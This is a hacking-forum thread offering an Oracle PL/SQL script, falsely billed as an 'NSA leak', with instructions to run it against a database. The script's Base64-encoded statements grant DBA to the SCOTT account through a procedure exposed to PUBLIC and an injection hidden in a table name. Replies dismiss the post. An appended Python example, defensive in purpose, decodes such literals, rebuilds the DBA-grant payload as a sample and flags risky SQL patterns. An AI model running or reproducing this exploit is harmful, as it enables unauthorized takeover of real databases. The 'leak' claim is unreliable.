NSA sqli leak #sqli
by un3xpectedbandit - Wednesday August 7, 2024 at 08:01 PM
#1
NSA gov sqli leak

Let me give a brief explanation of what this is.
The following strings in the script are in Base64 format. When decoded they translate to SQL commands to create and execute database procedures.
There are steps where you can create a stored procedure D that grants the DBA
Steps: you need to connect to an Oracle Database using an appropriate client to connect to the database and execute the script.
Here is the encoded Base64 strings leak:
Provided to you by h3x0rb
DECLARE

      JR VARCHAR2(32767);
      P VARCHAR2(32767);
      LWWQE VARCHAR2(32767);
      OWDG VARCHAR2(32767);
      DDHSZAS VARCHAR2(32767);
      BEGIN
      JR := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('CiAgICAgIENSRUFURSBPUiBSRVBMQUNFIFBST0NFRFVSRSBECiAgICAgIEFVVEhJRCBDVVJSRU5UX1VTRVIgQVMKICAgICAgUFJBR01BIEFVVE9OT01PVVNfVFJBTlNBQ1RJT047CiAgICAgIEJFR0lOIEVYRUNVVEUgSU1NRURJQVRFICdHUkFOVCBEQkEgVE8gU0NPVFQnOwogICAgICBFTkQ7CiAgICAgIA==')));
      EXECUTE IMMEDIATE JR;
      EXECUTE IMMEDIATE 'GRANT EXECUTE ON D TO PUBLIC';
      P := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('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')));
      EXECUTE IMMEDIATE P;
      EXECUTE IMMEDIATE 'GRANT EXECUTE ON DGFRL TO PUBLIC';
      LWWQE := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('Y3JlYXRlIHRhYmxlICJPJyBhbmQgMT1TQ09UVC5ER0ZSTC0tIihpZCBudW1iZXIp')));
      EXECUTE IMMEDIATE LWWQE;
      OWDG := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('ZHJvcCB0YWJsZSAiTycgYW5kIDE9U0NPVFQuREdGUkwtLSI=')));
      EXECUTE IMMEDIATE OWDG;
      DDHSZAS := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('aW5zZXJ0IGludG8gc3lzdGVtLkRFRiRfVEVNUCRMT0IgKFRFTVAkQkxPQikgVkFMVUVTICgnQUEnKQ==')));
      EXECUTE IMMEDIATE DDHSZAS;
      END;
      /
      DROP FUNCTION D;
      DROP FUNCTION DGFRL;
here is the file and also the decoded strings and also more instructions:
https://pixeldrain.com/u/KPsSbdFv
TELE: govbandit
TEAM: hexorb
--------------------
infosec
bugbounty
blackhat
Ban reason: Incapable of reading leak section rules | Consistently spamming other leaks and databases section | Low IQ | Unable to comprehend staff's requests to post in Exploits and POC section (Permanent)
Reply
#2
How is this a leak when the last line of the link says "Connect sqlplus username/password@//hostname:port/service_name @name_script.sql" - this is just base64?
Reply
#3
(08-08-2024, 03:16 PM)m1nut3m4n Wrote: How is this a leak when the last line of the link says "Connect sqlplus username/password@//hostname:port/service_name @name_script.sql" - this is just base64?

That is to connect to the database with your own Oracle database. Once you decrypt the base64 you should be able to use that to get some more info in the database.
Ban reason: Incapable of reading leak section rules | Consistently spamming other leaks and databases section | Low IQ | Unable to comprehend staff's requests to post in Exploits and POC section (Permanent)
Reply
#4
Another useless post thanks mr bandit
Reply
#5
why the hell do you spend your time posting this shit?
Reply
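Reply #2's observation that the script is only Base64 wrapped around SQL can be checked without connecting to any database. The following is an added example, not part of the thread or the posted script: a static triage that extracts each literal passed to `utl_encode.base64_decode`, decodes it offline and tags what the hidden statement does. The sample script, the helper names and the tag list are constructed for illustration.

```python
import base64
import binascii
import re

# Idiom used in the posted script: a Base64 literal is decoded at run time
# and the resulting text is handed to EXECUTE IMMEDIATE.
DECODE_CALL = re.compile(
    r"utl_encode\.base64_decode\s*\(\s*utl_raw\.cast_to_raw\s*\(\s*'([^']*)'",
    re.IGNORECASE,
)

# Fragments worth a reviewer's attention when they only appear after decoding
# (an illustrative list, not an exhaustive one).
RISKY = {
    "privilege grant": re.compile(r"\bGRANT\s+\w+", re.I),
    "dynamic SQL": re.compile(r"\bEXECUTE\s+IMMEDIATE\b", re.I),
    "invoker rights": re.compile(r"\bAUTHID\s+CURRENT_USER\b", re.I),
    "autonomous transaction": re.compile(r"\bPRAGMA\s+AUTONOMOUS_TRANSACTION\b", re.I),
    "DDL": re.compile(r"\b(CREATE|DROP|ALTER)\s+", re.I),
}

def triage(script: str) -> list[dict]:
    """Return one finding per Base64-decoded literal found in the script."""
    findings = []
    for lineno, line in enumerate(script.splitlines(), 1):
        for match in DECODE_CALL.finditer(line):
            try:
                raw = base64.b64decode(match.group(1), validate=True)
            except (binascii.Error, ValueError):
                # e.g. a redacted or truncated literal: report it, do not guess
                findings.append({"line": lineno, "decoded": None,
                                 "tags": ["undecodable literal"]})
                continue
            decoded = " ".join(raw.decode("utf-8", "replace").split())
            tags = sorted(n for n, rx in RISKY.items() if rx.search(decoded))
            findings.append({"line": lineno, "decoded": decoded, "tags": tags})
    return findings

def wrap_b64(var: str, sql: str) -> str:
    """Build a constructed sample line in the same shape as the posted script."""
    b64 = base64.b64encode(sql.encode()).decode()
    return (f"{var} := utl_raw.cast_to_varchar2(utl_encode.base64_decode("
            f"utl_raw.cast_to_raw('{b64}')));")

# Constructed sample input, not the script from the thread.
SAMPLE = "\n".join([
    "DECLARE", "  A VARCHAR2(32767);", "BEGIN",
    wrap_b64("  A", "CREATE OR REPLACE PROCEDURE D AUTHID CURRENT_USER AS "
             "PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE "
             "'GRANT DBA TO SCOTT'; END;"),
    "  EXECUTE IMMEDIATE A;",
    wrap_b64("  B", "SELECT 1 FROM dual"),
    "  C := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('<redacted>')));",
    "END;",
])

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

A literal that fails strict Base64 validation, such as a redacted one, is reported as undecodable rather than skipped, so gaps in a script stay visible to the reviewer.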

